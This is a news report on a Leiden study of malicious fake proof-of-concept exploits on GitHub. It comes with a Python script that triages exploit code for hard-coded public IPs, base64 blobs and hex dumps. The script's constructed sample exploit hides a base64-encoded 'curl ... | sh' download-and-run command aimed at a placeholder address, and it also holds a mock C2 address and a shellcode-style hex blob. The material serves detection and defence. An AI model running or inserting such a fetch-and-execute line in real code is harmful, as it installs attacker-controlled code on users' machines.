Analysis of the presence of malicious code in exploits published on GitHub

Researchers from the University of Leiden (Netherlands) studied the practice of publishing fake proof-of-concept exploits on GitHub that contain malicious code aimed at users who download the exploit to test for a vulnerability. In total, 47313 exploit repositories were analyzed, covering known vulnerabilities disclosed from 2017 to 2021. The analysis showed that 4893 (10.3%) of them contain code that performs malicious actions. Users who decide to run published exploits are advised to first inspect them for suspicious insertions and to run them only in virtual machines isolated from the main system.

Two main categories of malicious exploits were identified: exploits that carry a malicious payload, for example to leave a backdoor on the system, download a Trojan or add the machine to a botnet, and exploits that collect and exfiltrate confidential information about the user. A separate class of harmless bogus exploits was also identified: these perform no malicious actions but also lack the expected functionality, and are apparently meant to mislead or to warn users who run unverified code from the network.

Several checks were used to detect malicious exploits:

  • The exploit code was searched for hard-coded public IP addresses; the addresses found were then checked against blacklists of hosts known to control botnets or to distribute malicious files.
  • Exploits supplied in compiled form were scanned with anti-virus software.
  • The code was checked for unusual hexadecimal dumps or base64-encoded insertions, which were then decoded and examined.
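The first and third checks can be automated as a static triage pass over a PoC's source text. The script below is an added example, not code from the study or from opennet.ru: it extracts hard-coded IPv4 addresses and keeps only routable ones (the list of addresses you would then submit to a botnet blacklist lookup, which is not implemented here), locates base64 blobs, decodes them and rescans the decoded text for addresses, and reports runs of `\xNN` hex escapes. The sample exploit, the `scan_exploit`/`is_public` names and all addresses are constructed; the addresses come from the RFC 5737 documentation ranges so that nothing points at a real host, and for that reason the filter lists the non-routable ranges explicitly instead of relying on `ipaddress.is_global`, which treats documentation ranges as non-public.

```python
import base64
import binascii
import ipaddress
import re

# Constructed sample "exploit": a PoC-style script with one hard-coded public
# address in plain sight, a base64 blob hiding a second one, and a hex dump.
# All addresses are RFC 5737 documentation addresses (placeholders).
SAMPLE_EXPLOIT = r'''
import os, socket, base64
TARGET = "192.168.1.10"          # private address: normal for a lab PoC
C2 = "203.0.113.42"              # hard-coded public address: suspicious
PAYLOAD = "Y3VybCBodHRwOi8vMTk4LjUxLjEwMC43L3MgfCBzaA=="
os.system(base64.b64decode(PAYLOAD).decode())
sc = b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xcc"
'''

IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
# A run of 20+ base64 alphabet characters with optional padding.
B64_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{20,}={0,2}")
# Eight or more consecutive \xNN escapes, as found in inline shellcode/dumps.
HEX_RE = re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}")

# Ranges that cannot be a remote control host; everything else is "public".
NON_ROUTABLE = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
)]


def is_public(ip_text):
    """True if ip_text parses as an address outside the non-routable ranges."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return not any(ip in net for net in NON_ROUTABLE)


def public_ips(text):
    """Sorted, de-duplicated public IPv4 addresses found literally in text."""
    return sorted({m for m in IPV4_RE.findall(text) if is_public(m)})


def scan_exploit(text):
    """Run the IP, base64 and hex-dump checks over one exploit's source text."""
    findings = {"public_ips": set(public_ips(text)), "base64": [], "hex_blobs": []}

    for cand in B64_RE.findall(text):
        try:
            raw = base64.b64decode(cand, validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64 (e.g. a long identifier)
        try:
            decoded = raw.decode("ascii")
        except UnicodeDecodeError:
            continue  # binary payload; a full triage tool would still log it
        if not all(c.isprintable() or c in "\r\n\t" for c in decoded):
            continue
        findings["base64"].append(decoded)
        # Addresses hidden inside the blob count as much as plain-text ones.
        findings["public_ips"].update(public_ips(decoded))

    for run in HEX_RE.findall(text):
        blob = bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", run))
        findings["hex_blobs"].append(len(blob))  # report size; bytes need manual review

    findings["public_ips"] = sorted(findings["public_ips"])
    return findings


if __name__ == "__main__":
    import json
    print(json.dumps(scan_exploit(SAMPLE_EXPLOIT), indent=2))
```

On the constructed sample the scan reports both documentation addresses (the one hidden in the base64 string is only visible after decoding), the decoded blob itself, and an 11-byte hex dump; in practice the `public_ips` list is the input to the blacklist check the study describes, and any decoded blob that contains a download-and-execute command is the strongest signal of a bogus exploit.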

Source: opennet.ru
